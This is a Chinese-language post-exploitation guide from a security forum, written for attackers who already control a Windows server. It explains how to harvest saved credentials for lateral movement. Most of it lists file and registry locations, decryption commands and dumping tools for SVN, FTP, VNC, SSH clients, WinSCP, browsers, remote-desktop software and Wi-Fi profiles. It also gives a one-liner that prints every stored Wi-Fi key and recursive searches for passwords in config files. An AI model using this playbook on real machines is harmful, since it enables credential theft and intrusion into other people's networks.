0x00 前言 一般拿到服务器权限后,总需要收集一些运维或网管机子上的密码信息,方便后面横向渗透。 0x01 获取tortoiseSVN连接密码’tortoiseSVN’客户端连接记录文件位置:…
0x00 前言
一般拿到服务器权限后,总需要收集一些运维或网管机子上的密码信息,方便后面横向渗透。
0x01 获取tortoiseSVN连接密码
tortoiseSVN
客户端连接记录文件位置:
%userprofile%\AppData\Roaming\Subversion\auth\svn.simple
文件内容:
解密方法,使用TSvnPwd获取密码:http://www.leapbeyond.com/ric/TSvnPD/TSvnPwd.exe
0x02获取FlashFXP连接密码
主要文件为FlashFXP安装目录下面的Sites.dat
和quick.dat
,quick.dat
保存了快速连接的历史记录,Sites.dat
保存了站点记录。
- 解密方法
复制整个FlashFXP安装目录至本地,然后打开flashfxp.exe
,点击快速连接->历史,可以看到历史连接记录,并且可以直接连接:
- 解密方法2
使用FlashfxpPasswordDecryptor破解密码:https://www.cr173.com/soft/26711.html
0x03获取FILEZILLA连接密码
FILEZILLA客户端连接记录保存位置:
%userprofile%\AppData\Roaming\FileZilla\recentservers.xml
使用文本编辑器可以查看到账号密码,用base64解码即可(此处为filezilla3)
0x04获取Serv-U密码
获取ServUDaemon.ini文件:
Serv-U一般安装目录位于“C:\program files\Serv-U\”
密码破解,去掉前面两位字母然后到md5破解,全靠运气,密码也是去掉前面两位字母:
0x05获取VNC连接密码
-
TightVNC
注册表位置:
reg query HKEY_CURRENT_USER\Software\TightVNC\Server /v Password
reg query HKEY_CURRENT_USER\Software\TightVNC\Server /v PasswordViewOnly
TightVNC version 2.8.X位置:
reg query HKLM\SOFTWARE\TightVNC\Server /s
vncpwdump破解密码:http://www.cqure.net/tools/vncpwdump-win32-1_0_6.zip
vncpwdump.exe -k 78xxxxxxxx7
-
RealVNC
注册表位置:
HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\vncserver
3.x 在 HKEY_CURRENT_USER\Software\ORL\WinVNC3\Password ===windows 95
3.x 在 HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default\Password ===Win NT
4.x 在 HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 ===WinXP or Win2003
5.x 在 HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\vncserver ===WinXP or Win2003
-
TigerVNC
注册表位置:
HKEY_LOCAL_USER\Software\TigerVNC\WinVNC4
-
UltraVNC
配置文件位置:
C:\Program Files\UltraVNC\ultravnc.ini
0x06获取xshell记录密码
sessions文件位置:
XShell5 %userprofile%\Documents\NetSarang\Xshell\Sessions
XFtp5 %userprofile%\Documents\NetSarang\Xftp\Sessions
XShell6 %userprofile%\Documents\NetSarang Computer\6\Xshell\Sessions
XFtp6 %userprofile%\Documents\NetSarang Computer\6\Xftp\Sessions
使用Xdecrypt破解xshell保存的密码:https://github.com/dzxs/Xdecrypt
0x07获取SecureCRT记录密码
SecureCRT ini文件位置
%userprofile%\AppData\Roaming\VanDyke\Config\Sessions\
密码解密,获取ini文件中Password V2后面的值,去掉02:
python3 securecrt_password.py dec -v2 f83b09599d3e129xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxe7853c52
0x08获取winscp记录密码
默认注册表位置:
shell reg query "HKEY_USERS\S-1-5-21-****\Software\Martin Prikryl\WinSCP 2\Sessions\root@192.168.190.137" /s
HKEY_USERS\SID\Software\Martin Prikryl\WinSCP 2\Sessions\
WIN7\8下WinSCP文件默认位置:
%userprofile%\AppData\Local\VirtualStore\Program Files (x86)\WinSCP\WinSCP.ini (64位操作系统)
C:\Program Files (x86)\WinSCP\WinSCP.ini (64位操作系统)
%userprofile%\AppData\Local\VirtualStore\Program Files\WinSCP\WinSCP.ini (32位操作系统
C:\Program Files\WinSCP\WinSCP.ini (32位操作系统)
winscppwd破解密码:https://bitbucket.org/knarf/winscppwd/downloads/winscppwd.exe
winscppwd.exe winscp.ini
winscppwd.exe root 10.1xx.x.213 A35C425xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx3B2B6D6F656B696965646E646F8D
0x09获取浏览器信息
一键获取HackBrowserData:https://github.com/moonD4rk/HackBrowserData/
hack-browser-data.exe -b all -f json --dir results --cc
浏览器各类文件地址:
(1)、google
书签:%userprofile%\AppData\Local\Google\Chrome\User Data\Default\Bookmarks
Cookie: %userprofile%\AppData\Local\Google\Chrome\User Data\Default\Cookies
浏览历史:%userprofile%\AppData\Local\Google\Chrome\User Data\Default\History
当前的session:%userprofile%\AppData\Local\Google\Chrome\User Data\Default\Current
Session 账号密码:%userprofile%\AppData\Local\Google\Chrome\User Data\Default\Login
Data %userprofile%\AppData\Local\Google\Chrome\User Data\Profile 1\Login Data
(2)、QQ浏览器
⽤户数据⽬录:%userprofile%\AppData\Local\Tencent\QQBrowser\User Data\Default
缓存⽬录:%userprofile%\AppData\Local\Google\Chrome\User Data\Default\Cache\
各⽂件如下:
书签:%userprofile%\AppData\Local\Tencent\QQBrowser\UserData\Default\Bookmarks
Cookie: %userprofile%\AppData\Local\Tencent\QQBrowser\UserData\Default\Cookies
浏览历史:%userprofile%\AppData\Local\Tencent\QQBrowser\UserData\Default\History
当前的session:%userprofile%\AppData\Local\Tencent\QQBrowser\UserData\Default\CurrentSession
账号密码:%userprofile%\AppData\Local\Tencent\QQBrowser\UserData\Default\Login
Data或 %userprofile%\AppData\Local\Tencent\QQBrowser\UserData\Default\xxxxxxxxxxx\6
(3)、360浏览器
`账号密码⽂件:%userprofile%\AppData\Roaming\360se6\User
Data\Default\apps\LoginAssis\assis2.db`
(4)、Firefox
`账号密码⽂件:
%userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\7s5izkwl.defaultrelease\logins.json`
0x10获取向日葵密码
配置文件位置:
安装版:C:\Program Files\Oray\SunLogin\SunloginClient\config.ini
便携版(绿色版):C:\ProgramData\Oray\SunloginClient\config.ini
工具:https://github.com/wafinfo/Sunflower_get_Password\
0x11获取wifi连接密码
for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear
0x12获取FinalShell连接密码
以MAC为例,Finalshell保存密码的默认路径为:
/Users/<yourhostname>/Library/FinalShell/conn
FinalShellDecodePass脚本解密:
java FinalShellDecodePass <密文字符串>
0x13获取teamview连接密码
teamviewer-dumper:https://github.com/attackercan/teamviewer-dumper
0x14获取服务端明文存储密码
在一些配置文件或日志里,明文记录着敏感的密码信息,如web.config、config.ini等文件,可通过手动翻查敏感目录,也可以通过findstr命令来查找敏感文件和内容。
findstr /i /s "password" *.config
findstr /i /s "password" *.ini
findstr /i /s "password" *.xml
0x15综合
LaZagnez用于检索存储在本地计算机上的帐户密码的开源程序:
https://github.com/AlessandroZ/LaZagne
- 本文作者: secES
- 本文来源: 奇安信攻防社区
- 原文链接: https://forum.butian.net/share/797
- 版权声明: 除特别声明外,本文各项权利归原文作者和发表平台所有。转载请注明出处!